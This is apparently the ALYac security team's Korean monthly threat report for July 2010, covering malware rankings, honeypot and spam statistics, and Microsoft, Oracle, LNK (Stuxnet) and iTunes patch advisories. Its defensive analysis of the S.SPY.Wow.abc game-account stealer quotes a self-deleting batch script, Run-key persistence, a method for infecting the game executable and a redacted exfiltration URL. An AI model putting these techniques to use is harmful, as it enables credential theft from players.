목차 Part Ⅰ. 7 월의악성코드통계 1. 악성코드통계... 2 (1) 감염악성코드 Top 15... 2 (2) 카테고리별악성코드유형... 3 (3) 카테고리별악성코드비율전월비교... 3 (4) 월별피해신고추이... 4 (5) 월별악성코드 DB 등록추이... 4 2. 악성코드이슈분석 파일감염으로게임계정을훔치는 S.SPY.Wow.abc... 5 3. 허니팟 / 트래픽분석... 9 (1) 상위 Top 10 포트... 9 (2) 상위 Top 5 포트월별추이... 9 (3) 악성트래픽유입추이...10 4. 스팸메일분석...11 (1) 일별스팸및바이러스통계현황...11 (2) 월별통계현황...11 (3) 스팸메일내의악성코드현황...12 Part Ⅱ. 7 월의보안이슈돋보기 1. 7 월의보안이슈...13 2. 7 월의취약점이슈...15 페이지 1
Part Ⅰ 7월의악성코드통계 1. 악성코드통계 (1) 감염악성코드 Top 15 순위악성코드진단명카테고리 [2010 년 7 월 1 일 ~ 2010 년 7 월 31 일 ] 합계 ( 감염자수 ) 1 - V.DWN.Agent.Pinsearch Trojan 73,689 2 1 S.SPY.Lineag-GLG Spyware 52,483 3 New V.DWN.Agent.serv Trojan 46,383 4 New V.TRJ.AutoRun Trojan 44,634 5 3 V.ADV.Admoke Adware 43,123 6 3 S.SPY.OnlineGames.kb Spyware 34,854 7 New Trojan.Generic.4378689 Trojan 25,229 8 2 V.WOM.Conficker Worm 21,941 9 New V.TRJ.Agent.1588224 Trojan 18,831 10 4 V.DWN.VB.paran Trojan 18,198 11 2 V.DWN.el.39xxxx Trojan 17,994 12 New Trojan.Generic.4371269 Trojan 17,751 13 New Backdoor.Generic.4153251 Backdoor 16,110 14 - Trojan.Generic.4153251 Trojan 15,917 15 New A.SCT.setlink Adware 15,831 자체수집, 신고된사용자의감염통계를합산하여산출한순위임 감염악성코드 Top 15는사용자 PC에서탐지된악성코드를기반으로산출한통계이다. 7월의감염악성코드 TOP 15는 V.DWN.Agent.Pinsearch이 73,689건으로 TOP 15 중 1위를차지하였으며, S.SPY.Lineag-GLG가 52,483건으로 2위, V.DWN.Agent.serv가 46,383건으로 3위를차지하였다. 이외에도 7월에새로 Top 15에진입한악성코드는 7종이다. 이번달의특이사항은온라인게임의계정을탈취하는것으로알려진 S.SPY.Lineag-GLG, S.SPY.OnlineGames.kb이다른탐지명에비해소폭상승하였다. 페이지 2
(2) 카테고리별악성코드유형 웜 (Worm) 5% 애드웨어 (Adware) 13% 스파이웨어 (Spyware) 19% 백도어 (Backdoor) 3% 트로이목마 (Trojan) 60% 트로이목마 (Trojan) 스파이웨어 (Spyware) 애드웨어 (Adware) 하이재커 (Hijacker) 웜 (Worm) 취약점 (Exploit) 바이러스 (Virus) 백도어 (Backdoor) 악성코드유형별비율은트로이목마 (Trojan) 가 60% 로가장많은비율을차지하고, 애드웨어 (Adware) 가 13%, 스파이웨어 (Spyware) 가 19% 의비율을각각차지하고있다. 이번에 60% 의가장높은비율을차지한트로이목마 (Trojan) 는보안이취약한웹사이트에서유포된경우가많이발견되었다. (3) 카테고리별악성코드비율전월비교 바이러스 (Virus) 0.00% 0.00% 백도어 (Backdoor) 스파이웨어 (Spyware) 0.00% 3.48% 19.69% 18.86% 애드웨어 (Adware) 웜 (Worm) 취약점 (Exploit) 트로이목마 (Trojan) 하이재커 (Hijacker) 4.74% 4.74% 0.00% 0.00% 0.00% 0.00% 19.74% 12.73% 55.83% 60.18% 6 월 7 월 0% 20% 40% 60% 80% 100% 카테고리별악성코드비율을전월과비교하면, 트로이목마 (Trojan) 의경우전달에비해 4.53% 정도비율로증가하였고, 애드웨어의경우 (Spyware) 7.01% 정도감소하였다. ( 바이러스, 취약점등의경우 Top15를기준으로했을때차지하는비율이없다는것이다.) 페이지 3
(4) 월별피해신고추이 [2009 년 8 월 ~ 2010 년 7 월 ] 8 월 9 월 10 월 11 월 12 월 1 월 2 월 3 월 4 월 5 월 6 월 7 월 알약사용자의신고를합산에서산출한결과임 월별피해신고추이는알약사용자의신고를합산해서산출한결과로써, 월별신고건수를나타내는그래프이다. 7월의경우전달 (6월) 보다신고건수가소폭으로감소했다. (5) 월별악성코드 DB 등록추이 [2009 년 08 월 ~ 2010 년 7 월 ] 200908 200909 200910 200911 200912 201001 201002 201003 201004 201005 201006 201007 Adware Spyware Hijacker KeyLogger Exploit RAT Trojan Worm Backdoor Downloader Dropper Misc 페이지 4
Part Ⅰ 7 월의악성코드통계 2. 악성코드이슈분석 파일감염으로게임계정을훔치는 S.SPY.Wow.abc 최근온라인게임의보안문제가대두되면서특정프로세스를보호하기위한게임보안솔루션을도입하는사례가많아졌다. 솔루션도입후게임프로세스메모리를통해계정정보를탈취하는일이어렵게되었다. 그러자게임실행파일자체를수정해서보호매커니즘을우회하는악성코드가등장하기시작했다. S.SPY.Wow.abc 는 Dropper 악성코드로리소스에서 DLL 을 Drop 하고실행중인와우 (wow) 게임프로그램을찾아서종료시킨다. 그리고.bat 파일을이용해자기자신을삭제한다. Drop 된 DLL 은와우 (wow) 게임실행파일인 wow.exe 를감염시키고계정정보를탈취해서특정사이트로전송한다. 1) Dropper Dropper는 DLL 파일을 Drop하여실행하고자기자신을삭제한다. DLL Drop [%SYSTEM%\mslagcpt.dll] 파일이있는지확인하고없으면파일의리소스영역에서암호화된 DLL 파일을복호화해서파일을 Drop한다. 그후 CreateProcessA() 를사용하여 DLL 파일의 w() 함수를실행한다. CreateProcessA(0, "Rundll32.exe %SYSTEM%\mslagcpt.dll,w",...); Dll 파일의 w() 함수는 dll 분석부분에서자세히알아본다. 그리고 GxWindowClassD3d 라는클래스를찾아 WM_CLOSE 메시지를보내서해당프로세스를종료시킨다. < 그림 : GxWindowClassD3d 클래스를찾아서종료메시지를보냄 > 페이지 5
GxWindowClassD3d 는와우 (wow) 에서사용하는클래스중하나다. 그러므로와우 (wow) 가실행중이면 WM_CLOSE 메시지를보내서종료시킨다. 이는와우 (wow) 를다시실행시키기위함이고다시실행하기전에계정을보다쉽게탈취하기위한사전작업이다. 자세한내용은 DLL 분석부분에서다룬다. 자신을삭제실행한후.bat 파일을사용하여자기자신을삭제한다. 그내용은다음과같다. @echo off :try @Del [ 타겟 ] @if exist [ 타겟 ] goto try @Del %0 [ 타겟 ] 을삭제하고지워졌는지확인한다. 만약지워지지않았다면루프를돌면서계속시도한다. 성공하였으면자기자신을지운다 (del %0). 2) DLL DLL은크게 3개의함수로나눌수있다. 레지스트리등록, wow.exe 파일감염, 계정탈취레지스트리등록은 Run에등록하여 DLL이실행시마다자동으로실행하도록하고, wow.exe 파일을감염시켜서실행시악성 DLL을로드하도록한다. 마지막으로프로세스에침투한악성 DLL은메모리에서계정정보를수집하여특정사이트로보낸다. 레지스트리등록 Windows 7이면 HKEY_CURRENT_USER, Windows 7이아니면 HKEY_LOCAL_MACHINE의 SOFTWARE\Microsoft\Windows\CurrentVersion\Run에다음의값을생성하여부팅시마다 DLL이실행되도록한다. Jswqvj;%SYSTEM%\mslagcpt.dll,w w() 함수 w() 함수는드롭퍼 (Dropper) 가 dll을드롭 (Drop) 하면서가장먼저실행하는함수이다. Wow.exe 파일을감염시키기위해다음의레지스트리값을가져와서설치된디렉토리를찾는다. HLM\SOFTWARE\Blizzard Entertainment\World of Warcraft\GamePath Wow.exe이이미감염되었는지섹션헤더이름을비교하며체크한다. 섹션헤더중.ngaut 섹션이있으면감염되었다고판단하고만약없으면감염시킨다. 섹션추가에필요한 IMAGE_NT_HEADERS를수정하고.ngaut 섹션헤더를추가한다. 그리고섹션정보상의파일끝에섹션데이터를추가하고그곳으로 entry-point를변경한다. 페이지 6
< 그림 : 변경된 IMAGE_NT_HEADERS> < 그림 : 추가된.ngaut 섹션헤더 > < 그림 : 변경된 entry-point 의코드 > 삽입된코드는 msvcr70을로드하고 w함수를찾아서실행하는일을한다. msvcr70은 DLL 파일의복사본이다. 만약게임보안솔루션으로보호중이라면프로세스에 DLL을인젝션하기어려워 페이지 7
아예실행파일에코드를넣었을것이라추측된다. 만약파일에대한무결성검사를한다면금방탐지가능하다. 마지막으로 SetWindowsHookExA 함수를이용하여모든프로세스에 DLL을인젝션한다. 계정탈취계정을탈취하기위해다음의조건을만족시키는지검사한다. 1) DLL이로드된프로세스의실행파일이름이 wow.e 로시작한다. 2) 프로세스의타이틀이름이 World of Warcraft 이다. 3) GxWindowClassD3d 라는클래스가존재한다. 위세조건이만족되면 dll이로딩된곳이와우 (wow) 프로세스라는것을확신하고계정을탈취하는작업을한다. 계정탈취는 [ 와우디렉토리 ]\WTF\Config.wtf 같은특정파일이나프로세스메모리의특정오프셋에저장된값을가져오는방식으로한다. 그후특정사이트에정보를다음과같이전송한다. http://x.xxxxxxxxxx.com:888/xxx/wow.asp?wowid=****&area=****&wu=****&wp =****&MAX=****/****&Gold=****&Serv=****&rn=****&key=**** 5) 결론지금까지의계정을탈취하는악성코드는프로세스메모리에침투하거나네트워크로전송되는패킷을얻어계정정보를얻는방식이었다. 하지만이번악성코드는실행파일을감염시켜서실행시에악성 DLL을로드 (load) 하기때문에외부프로세스로부터의침투를막는보호솔루션은무용지물이된다. 이문제를막기위해서는실행전에무결성 (integrity) 을검사해야한다. 그리고와우 (wow) 유저입장에서는게임도중갑자기프로그램이종료되는경우가있다면일단의심을하고백신을최신으로업데이트하고시스템검사를수행하는것이좋다. 페이지 8
Part Ⅰ 7월의악성코드통계 3. 허니팟 / 트래픽분석 (1) 상위 Top 10 포트 21 TCP 3% 1433 TCP 2% 135 TCP 93% 135 21 1433 3389 3306 80 2967 8080 110 4899 7월에는지속적으로윈도우자체의취약점을대상으로한 135 TCP 포트침입시도가가장많았다. 135 TCP 포트에대한침입시도는 RPC(Remote Procedure Call) 버퍼오버런이가능한보안취약점을주로이용한다. 취약점을이용한공격이성공할경우 PC에악성코드를감염시킬수있다. (2) 상위 Top 5 포트월별추이 [2010 년 5 월 ~ 2010 년 7 월 ] 135 21 1433 25 3306 2010-05 2010-06 2010-07 전체적으로악성트래픽유입이전달에비해증가하였고 135번이외의포트들도악성트래픽유입이증가하였다. 외부에서 135번포트로접근이불필요한경우방화벽이나 IPS에서차단하는것이보안예방효과에좋다. 페이지 9
(3) 악성트래픽유입추이 [2009 년 2 월 ~ 2010 년 7 월 ] 2010-02 2010-03 2010-04 2010-05 2010-06 2010-07 지난달에비해악성트래픽유입이다시증가하였다. 갈수록 SEO(Search Engine Optimization, 검색엔진최적화 ) 을악용하는악성코드가문제가되고있다. 이것은 Black-hat SEO라불리며, 검색엔진최적화를악용하여 iframe등을삽입한페이지를검색결과상위권에나타나게조작한다. 즉스스로사용자로하여금악성코드를다운로드, 설치하게한다. 이렇게감염된악성코드는자신도모르는사이특정사이트를공격하는공격도구가될수있으므로반드시최신의백신을사용해야한다. 페이지 10
Part Ⅰ 7월의악성코드통계 3. 스팸메일분석 (1) 일별스팸및바이러스통계현황 35,000 30,000 25,000 20,000 15,000 10,000 바이러스스팸 5,000 0 2010-07-01 2010-07-03 2010-07-05 2010-07-07 2010-07-09 2010-07-11 2010-07-13 2010-07-15 2010-07-17 2010-07-19 2010-07-21 2010-07-23 2010-07-25 2010-07-27 2010-07-29 일별스팸및바이러스통계현황그래프는하루에수신된악성코드첨부, 스팸메일의개수를나타낸그래프이다. 7월의경우지난해발생한 7.7 DDoS 공격 1주년이었지만여전히 DDoS 감염후발송되는이메일들이상당수보고되고있다. (2) 월별통계현황 [2010 년 2 월 ~ 2010 년 7 월 ] 2,500,000 1.5% 2,000,000 1.5% 1,500,000 1,000,000 3.7% 2.6% 98.4 2.5% 2.6% 98.5 바이러스 스팸 500,000 96.2 97.3 97.4 97.3 0 2 월 3 월 4 월 5 월 6 월 7 월 페이지 11
월별통계현황은악성코드첨부및스팸메일이전체메일에서차지하는비율을나타내는그래프이다. 7월달스팸메일은 98.5%, 바이러스메일은 1.5% 를차지하였다. 6월에비해스팸메일이 1.5% 증가, 바이러스메일이 1.1% 비율로감소하였다. (3) 스팸메일내의악성코드현황 [2010 년 7 월 1 일 ~ 2010 년 7 월 31 일 ]ff 순위 악성코드진단명 메일수 [ 개 ] 비율 [%] 1 W32/Virut-T 11,993 45.78% 2 Mal/ZipMal-B 4,037 15.41% 3 W32/MyDoom-H 3,287 12.55% 4 W32/Mytob-C 1,205 4.60% 5 Troj/CryptBx-ZP 685 2.61% 6 Troj/JSRedir-BV 666 2.54% 7 W32/MyDoom-Gen 555 2.12% 8 Mal/BredoZp-B 501 1.91% 9 VPS-090709-DDoS-2 459 1.75% 10 W32/Sality-I 454 1.73% 스팸메일내의악성코드현황은 6월바이러스메일에서발견된악성코드중 Top 10을뽑은그래프이다. 현재 W32/Virut-T이 45.78% 로계속 1위를차지하고있다. 2위는 15.41% 를차지한 Mal/ZipMal-B, 3위는 12.55% 를차지한 W32/MyDoom-H이다. 특히, 7.7 DDoS 관련된이메일이아직도발견되는것으로보아현재도악성코드가치료되지않고방치된 PC들이여전히존재하는것으로파악된다. ( 닷넷프레임워크가설치되지않은 PC에서는시스템파괴가진행되지않는다.) 페이지 12
Part Ⅱ 7 월의이슈돋보기 1. 7 월의보안이슈 7월에는미투데이를이용한악성코드유포사례를처음으로발견한사례와, 이스트소프트의 ASM 2.0 출시, 일년만에다시돌아온 7.7 DDoS에대한보안이슈들이있었습니다. 미투데이를이용한악성코드유포사례처음으로발견윈도우업데이트파일로위장한악성 DLL 파일이국내에서서비스되고있는미투데이와해외의트위터 (Twitter) 를통해추가악성코드를다운로드받게한사례를처음으로발견하였습니다. 현재까지소셜네트워킹서비스 (SNS) 를통한악성코드유포는주로해외의트위터 (Twitter) 나페이스북 (Facebook) 등을중심으로이루어졌으나국내사용자가대다수를차지하는미투데이를통해악성코드를유포한사례로는이번이처음입니다. 특히이번에유포된악성코드는감염 PC를좀비 PC로만들어공격자의추가공격명령을기다리며, 악성코드를다운로드하는서버가국내에위치하고있었습니다. < 미투데이 (m2day) 와트위터 (twitter) 를통해유포되는악성코드다운로드주소 > 이스트소프트리눅스용중앙관리솔루션 ASM 2.0 출시리눅스환경에서도사용할수있는알약중앙관리솔루션 ASM(ALYac Security Manager) 2.0 Linux Edition이 7월 14일에새롭게출시되었습니다. ASM 2.0 Linux Edition은관리자가기업내에알약 2.0이설치된 PC에대한통합적인보안관리및자산관리, 보안정책적용을수행하도록하는리눅스기반의통합중앙관리솔루션입니다리눅스사용으로 OS 및 DB 구매와관련된추가비용없이 ASM 2.0을구축하실수있으며윈도우에서지원되는 ASM 주요기능을그대로사용할수있습니다. 이외에도 ASM 2.0 Linux Edition에최적화된하드웨어 (HP DL320 G6 서버 ) 를추가로구매하실수있습니다. ( 구입문의 : 비전파워 02-2051-0033, 오렌지테크 02-562-7009) 페이지 13
이스트소프트내부자료유출차단솔루션 시큐어디스크 출시기업내부의중요자료유출을차단할수있는시큐어디스크가새로출시되었습니다. 그동안사용자 PC에업무파일을저장했던것을시큐어디스크서버에만저장되게해자료의유출을방지하고안전하게보관하실수있습니다. 또한, 보안파일서버영역이외의사용자 PC나외장하드디스크, USB 등다른저장매체대한내부자료저장을차단하며프린트, 화면캡쳐등을통한자료유출, 전송및저장되는모든파일에대해암호화를지원해해킹등외부공격에의한파일유출, 내부자에의한악의적인자료유출시도도차단할수있습니다. ( 구입 제품문의 : 이스트소프트 02-3470-2980 http://www.securedisk.co.kr) 일년만에다시돌아온 7.7 DDoS 2009년청와대및정부기관, 금융기관, 인터넷포탈등을대상으로한 DDoS 공격이정확히일년후다시재발생하였습니다. 다행히작년보다 DDoS 공격규모는훨씬적었고, DDoS 대응체계를어느정도마련해큰피해는발생하지않았습니다. 하지만좀비 PC 상태에서여전히치료되지않고방치된 PC들이 DDoS 공격을수행해이들방치된좀비 PC들에대한검사및치료가시급히요구되고있습니다. <7.7 DDoS 공격을수행한악성코드파일들의관계도 > 페이지 14
Part Ⅱ 7 월의이슈돋보기 2. 7 월의취약점이슈 Microsoft 7월정기보안업데이트도움말및지원센터의취약점으로인한원격코드실행문제해결, Canonical Display Driver의취약점으로인한원격코드실행문제해결등을포함한 7월 Microsoft 정기보안업데이트를발표하였습니다. 그동안제로데이상태였던도움말및지원센터취약점 (MS10-042, CVE-2010-1885) 패치가포함되어있으므로반드시설치하시기바랍니다. < 해당제품 > Microsoft Windows XP Servie Pack 2~3 (x64 포함 ) : MS10-042 Microsoft Windows 2003 Service Pack 2 (x64, Itanium 포함 ) : MS10-042 Microsoft Windows 7 (32bit, x64) : MS10-042, MS10-043 Microsoft Windows 2008 R2 x64, Itanium : MS10-042, MS10-043 Microsoft Office XP Service Pack 3 : MS10-044, MS10-045 Microsoft Office 2003 Service Pack 3 : MS10-044, MS10-045 Microsoft Office 2007 Service Pack 1~2 : MS10-044, MS10-045 < 취약점목록 > 도움말및지원센터의취약점으로인한원격코드실행문제점 (2229593) Canonical Display Driver의취약점으로인한원격코드실행문제점 (2032276) Microsoft Office Access ActiveX 컨트롤의취약점으로인한원격코드실행 (982335) Microsoft Office Outlook의취약점으로인한원격코드실행문제점 (978212) < 해결책 > Windows Update를수행하거나 Microsoft 보안공지요약사이트에서해당취약점들의개별적인패치파일을다운로드받을수있습니다. 한글 : http://www.microsoft.com/korea/technet/security/bulletin/ms10-jul.mspx 영문 : http://www.microsoft.com/technet/security/bulletin/ms10-jul.mspx 7월 Oracle Critical Patch Update 권고 Oracle 사의제품을대상으로다수의보안패치를묶어 7월 13일에발표하였습니다. 국내에서는오라클제품과미들웨어제품들의사용처가매우많으므로주요정보시스템의기밀성과무결성을보존하기위해취약점패치를권고합니다. < 해당제품 > Oracle 제품을대상으로한 (Sun 제품라인포함 ) 59개의보안패치를발표하였습니다. 6 for Oracle Database Server 페이지 15
2 for TimesTen In-Memory Database 5 for Oracle Secure Backup 7 for Oracle Fusion Middleware 1 for Oracle Enterprise Manager 7 for Oracle E-Business Suite 2 for Oracle Supply Chain Products Suite 8 for Oracle PeopleSoft and JDEdwards Suite 21 for Oracle Sun Products Suite < 취약점목록 > 자세한취약점 Matrix 및정보는 http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html 를참조하시기바랍니다. < 해결책 > "Oracle Critical Patch Update July 2010" 문서를참조하고제품공급사나유지보수업체와의협의 / 검토후패치적용을권장합니다. (DB 및 WAS 등주요정보시스템에영향이미칠수있음 ) http://www.oracle.com/technology/deploy/security/critical-patchupdates/cpujul2010.html 윈도우의도움말및지원센터제로데이보안취약점윈도우의쉘 (Shell) 에서단축아이콘 (LNK; Shortcut) 파일을처리하는과정에원격코드가실행될수있는취약점이발견되었습니다. 현재이번취약점을이용한악성코드 ( 알약진단명 : Win32.Worm.Stuxnet.A) 가 South East Asia 지역 ( 인도및인도네시아이란등 ) 을중심으로유행하고있으며, 국내에서도악성코드확산위협이높으므로 PC 사용자의주의가필요합니다. < 상세정보 > 해커가조작한악의적인단축아이콘 (LNK) 파일에서특정프로그램을실행시킬수있는취약점이존재하며 USB 이동식디스크 (USB 메모리 ) 에악성 LNK를담아악성코드가유포될수있는가능성이높습니다. < 해결책 > - (8월 3일공식보안패치발표추가 ) Microsoft에서 LNK 취약점 (CVE-2568) 에대한보안패치를발표하였습니다. 아래의사이트에들어가해당윈도우버전에맞는보안패치를내려받은후설치합니다. 공식보안패치를설치한후에는임시조치법를실행하지않아도됩니다. 한글 : http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx 영문 : http://www.microsoft.com/korea/technet/security/bulletin/ms10-046.mspx 페이지 16
Apple itunes 9.2.1 업데이트권고 PC에설치된 itunes에서보안취약점 (CVE-2010-1777) 을통해원격코드실행및 DoS(Denial-of-Service) 상태를일으킬수있습니다. 이에애플 (Apple) 사에서아이튠즈 (itunes) 의 CVE-2010-1777 취약점을해결하는업데이트를발표하였습니다. < 해당제품 > Apple itunes 9.2.1 이하버전 < 상세정보 > itpc URL의잘못된처리로인해버퍼오버플로우 (Buffer Overflow) 가발생하게되며이를통해 itunes가비정상적으로종료되거나원격코드를실행할수있어 PC에악성코드가감염될수있습니다. < 해결책 > Apple itunes를 9.2.1 버전으로업데이트합니다. < 관련홈페이지 > http://support.apple.com/kb/ht4263 http://www.us-cert.gov/current/index.html#apple_releases_itunes_9_21 페이지 17
Contact us 이스트소프트알약보안대응팀 Tel : 02-881-2364 E-mail : help@alyac.co.kr : 알약사이트 : www.alyac.co.kr 페이지 18